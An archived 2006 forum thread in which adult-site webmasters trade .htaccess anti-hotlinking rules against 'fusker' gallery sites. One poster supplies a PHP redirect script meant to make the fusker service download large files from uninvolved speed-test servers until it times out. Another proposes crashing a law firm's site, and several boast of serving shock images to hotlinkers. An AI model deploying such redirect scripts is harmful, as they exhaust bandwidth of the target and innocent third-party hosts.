Greenguy's Board

Greenguy's Board (http://www.greenguysboard.com/board/index.php)
-   General Business Knowledge (http://www.greenguysboard.com/board/forumdisplay.php?f=10)
-   -   Anti-Fusker Thread (http://www.greenguysboard.com/board/showthread.php?t=29480)

johnnybg 2006-03-02 03:34 AM

Anti-Fusker Thread
 
I forgot to put .htaccess on one of my sites, and it got "fuskered". Well, I was so pissed off so I rewrote .htaccess file so they are now hotliking themselves. Here's the script

----
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?johnnysporn.com [NC]
RewriteRule \.(jpg|jpeg|png|gif)$ http://fusker-static.lewww.com/logo.gif [NC,R,L]
----

So, instead of hotlinking my pics, they are now hotlinking their logo.

I suggest everyone check their .htaccess because these fuckers can burn a lot of your bw for nothing.

Toby 2006-03-02 05:27 AM

The only problem I see with that, is anyone else hotlinking your pics is also getting the fusker logo. Why advertise for them?

I use tubgirl as my anti-hotlink image. I rarely need to ask to have any hotlinks removed. They remove them voluntarily, usually within a few hours.

johnnybg 2006-03-02 06:04 AM

Quote:

Originally Posted by Toby
The only problem I see with that, is anyone else hotlinking your pics is also getting the fusker logo. Why advertise for them?

I use tubgirl as my anti-hotlink image. I rarely need to ask to have any hotlinks removed. They remove them voluntarily, usually within a few hours.

Well, I politely requested them to remove my domain from their lists five times. After that, I decided to do this. I'm working on picture called "This picture is hotlinked from johnnysporn.com" which will be used for hotlinking purposes.

I just wanted to see how they hotlink their own picture. Just a bit mean this morning I guess... |angry|

eman 2006-03-02 07:21 AM

I'd never heard of tubgirl, so I did a search.

I wish I hadn't |flush|

Toby 2006-03-02 07:23 AM

Quote:

Originally Posted by eman
I'd never heard of tubgirl, so I did a search.

I wish I hadn't |flush|

:D Now you understand why hotlinkers voluntarily remove the links.

RawAlex 2006-03-02 08:43 AM

Some people will suggest that the "hotlinked from johnnyporn.com" would be the best solution (some people might type in the URL to see what they are missing) but in my mind fusker surfers are cheap bastards that would never pay for porn anyway, probably surf with java off, and wouldn't click on a single paying link in their lives.

I just want them to leave me alone, so tubgirl it is.

I have a short list of domains that get the same treatment, I have noticed a new batch of sites in the last couple of weeks building galleries that they submit around that have thumbs on their site, but the actual images hotlinked from mine.

They too are enjoying tubgirl.

Alex

johnnybg 2006-03-02 08:53 AM

I like your creative thinking! :)

Cleo 2006-03-02 08:56 AM

I'm serving up an image that says visit Cleos-Porn-Links.com for Free Porn and I do get a fair amount of traffic from it. I also had a script installed on my server that does this for no referral hot linking traffic since much of Fusker traffic was no referral so htaccess was of no use.

johnnybg 2006-03-02 09:08 AM

Cleo, can you share which script you used for no referral hot linking?

Cleo 2006-03-02 09:24 AM

Quote:

Originally Posted by johnnybg
Cleo, can you share which script you used for no referral hot linking?

Using this and I'm very happy with it. :)
http://www.trafficguardian.com/


|bananna| |bananna| |bananna| |bananna|

johnnybg 2006-03-02 09:31 AM

Thanks Cleo!

VicD 2006-03-02 07:58 PM

Quote:

Originally Posted by Toby
The only problem I see with that, is anyone else hotlinking your pics is also getting the fusker logo. Why advertise for them?

I use tubgirl as my anti-hotlink image. I rarely need to ask to have any hotlinks removed. They remove them voluntarily, usually within a few hours.

Haha, i can imagine that :D

Mr. Stiff 2006-03-03 03:51 AM

I used to serve them goatse.. But now that i'm using thttpd for my galleries I cannot redirect to another url :(

Fusker should die slowly and painfully..

MonsterPartners 2006-03-03 09:10 AM

Quote:

Originally Posted by Toby
The only problem I see with that, is anyone else hotlinking your pics is also getting the fusker logo. Why advertise for them?

I use tubgirl as my anti-hotlink image. I rarely need to ask to have any hotlinks removed. They remove them voluntarily, usually within a few hours.

I have used tubgirl many times in situations like that....I have also found that people were more than willing to remove the image hehe

buttster 2006-03-04 11:10 PM

who do you ask permission from to use tubgirl pic, I am getting fuskered big time on two of my domains.

RawAlex 2006-03-04 11:46 PM

You don't ask permission... just shove them over there. Not your issue, if fusker wasn't hotlinking, they wouldn't get hit... I am sure they don't get hit too hard, considering that tubgirl galleries rarely last more than a few minutes :)

Alex

Mr. Stiff 2006-03-05 06:02 AM

johnnybg's post about redirecting to fusker itself has inspired me..
I think I have found a way to kill fusker.. :D

.htaccess
Code:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?YOURDOMAIN.COM [NC]
RewriteRule \.(jpg|jpeg|png|gif)$ http://www.YOURDOMAIN.COM/fuckser.php [NC,R,L]

fuckser.php
Code:

$payloads = array(        "http://speed.mirror.sptel.com.au/10mb.dat",
                                        "http://www.truong-is.nl/speedtest/10mb.bin",
                                        "http://subscribers.aroundcarolina.com/bigtest.xyz",
                                        "http://www.ayksolutions.com/speedtest/10meg.file",
                                        "http://comxnet.dk/speed/1MB.bin",
                                        "http://speedtest.multikabel.net/10mb.bin",
                                        "http://ns0.multikabel.net/10mb.bin");

$kick = $payloads[rand(0,(count($payloads)-1))];
$url = "http://fusker.lewww.com/index.php?url=".urlencode($kick)."&method=images";
header("Location: $url");

?>

Place fuckser.php in your webroot (or any subdir). You can expand the array with more URL's, anything big will do (.exe, .zip, etc)

This code assumes the user fuskering your gallery is logged in. It will send a request to fusker.lewww.com to download one of those big files.

It seems Fusker doesn't check if the page actually is a HTML page..

Do with this what you like, but if you decide to use it.. Let me know, would see to see 'request timeout' on fusker ;)

ronnie 2006-03-05 10:44 AM

Why did I have to seek out tubgirl? There goes the rest of my day.. :(

ronnie

cd34 2006-03-05 11:23 AM

redirecting a fusker hotlink 'attack' to someone else innocent is almost as bad as the original problem.

Hand them an image that advertises your site, redirect them to another fusker search url, or, do the right thing and track down their connections, report a DMCA violation to their host and both upstreams, then, take a look at the advertisers on that page, check their Terms & Conditions and write them an email saying that this advertiser is violating their T&C, take out the paragraph from their T&C and highlight it, and, send them links to content that you know they don't hold the copyright to.

Until you hit their money source, they'll never stop.

Here's a thread that includes a copy of the email I was sending to program owners. I believe it was somewhat instrumental in getting usefulidiot.com shut down which was a fusker clone.

So, if every time you see a violation it is reported to the host & the host's upstream providers and the fusker mirror's income stream, eventually it'll become a paid hobby rather than an income producing hobby and perhaps it'll lose its lustre to those running the sites. Either that or they'll get tired of continually having to find new sponsors.
http://www.greenguysboard.com/board/...ad.php?t=17808

digifan 2006-03-05 11:42 AM

Those sites will never die.. they always find new sponsors or advertisers, dammit. Your .htaccess works Sparky :D

cd34 2006-03-05 11:45 AM

that's actually Raymor's .htaccess

Doug E 2006-03-07 06:27 PM

How about we set it so fusker ends up hotlinking a big ass image from an internet law firm. So if one of us gets fuskered they crash the law firms site.

terry 2006-03-07 08:37 PM

I really really hate fusker... found 2 more sites I didnt already have blocked.. GRRRR.

johnnybg 2006-03-09 08:27 AM

Well I've been browsing around some fusker sites for a couple of days now.

There is one that caught mu eye: fusker.usanurse.org

This guy has advertising a the bottom of the page for these sites: LittleApril.com, MILFHunter.com, MILF Seeker, Cum Fiesta, Captain Stabbin, ChristineYoung.com, TeensForCash.com, JordanCapri.com, Lesbo101.com, Twistys.com, CollegeFuckFest.com, PeterNorth.com, XXX Proposal, Teeny Bopper Club, Bikini Contest Porn, Blind Date Sluts, Bus Stop Whores, BigNaturals.com, Load Junkies, Bang Bros, HerFirstAnalSex.com, MikeInBrazil.com

He created mirror pages of these sites on the domain iwantanewgirlfriend.com with subdomains as names of affected sites. He linked join page links of actual sites with his ref codes.

Clever isn't it?

This is even better! He actually hotlinked one of his sponsors on his site .

RawAlex 2006-03-09 10:02 AM

You might want to put the program names in there to try to twig board tracker:

teenrevenue.com
nastydollars.com
braincash.com
lightspeedcash.com


All times are GMT -4. The time now is 08:16 PM.

Powered by vBulletin® Version 3.8.1
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
© Greenguy Marketing Inc